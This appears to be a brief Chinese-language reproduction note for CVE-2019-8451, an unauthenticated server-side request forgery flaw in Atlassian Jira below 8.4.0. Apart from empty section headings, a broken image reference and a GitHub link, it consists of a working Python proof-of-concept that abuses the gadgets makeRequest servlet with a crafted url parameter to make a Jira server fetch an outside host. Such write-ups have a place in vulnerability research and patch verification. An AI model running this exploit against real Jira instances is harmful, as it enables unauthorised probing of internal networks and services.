(CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证
一、漏洞简介
二、影响范围
Atlassian Jira < 8.4.0
三、复现过程
AtlassianJira未授权SSRF漏洞验证/media/rId24.png)
https://github.com/ianxtianxt/CVE-2019-8451
#coding:utf-8 import requests host = 'http://xx.xx.xx.xx:8080' header = { 'X-Atlassian-Token': 'no-check', 'Connection': 'close' } url = host + '/plugins/servlet/gadgets/makeRequest?url='+host+'@www.baidu.com/' html = requests.get(url = url,headers = header) print html.text